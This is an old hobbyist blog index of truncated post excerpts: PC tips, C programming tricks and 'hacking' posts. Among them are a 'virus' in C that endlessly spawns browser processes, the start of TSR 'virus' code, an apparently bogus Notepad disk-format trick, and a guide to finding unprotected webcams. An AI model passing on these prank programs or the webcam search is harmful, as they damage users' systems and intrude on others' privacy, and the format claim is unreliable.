31 July 2011

how to back up ur data before formating

You might think that installing an operating system would be a simple procedure. And you’d be right. However, you really should know what you’re doing before you undertake this process. Even if you already know how to do it, it’s always nice to go with procedure. The first thing you should do before installing a new operating system is to back up your...

30 July 2011

-: Format A HDD With Notepad :-

If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.Step 1 :- Copy The Following In Notepad Exactly as it is. says01001011000111110010010101010101010000011111100000 Step...

29 July 2011

speed up your internet

Increase BROADBAND speed in WinXP *Should work for 56k also*  1. make sure your logged on as actually "Administrator". do not log on with any account that just has administrator privileges. 2. start - run - type gpedit.msc (not available in home version) 3. expand the "local computer policy" branch 4. expand the "administrative templates" branch 5....

28 July 2011

How to Hack Webcam

This is not a hacking Guide.. It's rather a tutorial to show you how to do a simple search for unprotected webcams on the net. This is only for fun purposes... You are totally responsible for your actions... (note: these are not personal webcams, this is only a guide on...

Booting Xp With A Pen Drive

There are times when a minor error in the Windows Registry or a Virus Infection, can make your system unbootable. In such a condition a properly configured USB drive on hand with Bart Lagerweij's free utility (BartPE), is a handy replacement for windows operating system. BartPE will give you a complete Win32 environment with network support, a graphical...

27 July 2011

TSR Virus Creation Using C

Hi, This is a simple program of TSR Remember compile and link this code in you environment and then quit the program and then execute it. */ #include "dos.h" void interrupt detect_x8(...); void interrupt (*prev_x8)(...); char far *scr=(char far *) 0xB8000000L; int ticks; unsigned int color; void main(void) {     prev_x8=getvect(8);  ...

26 July 2011

how to run a C compiler in window 7

if u r a programer aur belong to computer back ground then you must come across a situation when u choose window 7 as your only operating system but the main problem with window 7 (64 bit ) is that it does not support turbo C at all.However the window 7 (32 bit) support turbo C but in minimized window. so here is the solution of your problem  use...

24 July 2011

How to run a program in C without using semicolon ( ; )

This is question most interviewer like to ask. so here is the source code to  print something without semicolon #include<stdio.h> void main() {        if(printf("hello world"))           ...

how to hack windows product id

1. the product id is the alphanumeric code that u see when u right click on my computer icon and select properties 2. It is possible to ulter that code and change it to what ever u like e.g - your name , email address etc. 3. Below is the step by step procedure to change the prodct id  goto run type regedit HKEY_LOCAL_MACHINE\software\microsoft\windows...

23 July 2011

virus creation in C

1.write the following programe in turbo C void main(void) {       for( ; ; )           {       system("c:\\progra~1\\intern~1\\iexplore.exe");           }  } 2. save the above file. and let the name be net.c and compile...

program to shutdown your PC using C programming

A programe in C to shutdown your window PC 1. write the following code in turbo C void main(void) { system("shutdown-s"); }  2. save the above file .let the file name is close.c . now compile and execute the above programe.   now close the compiler. now open the...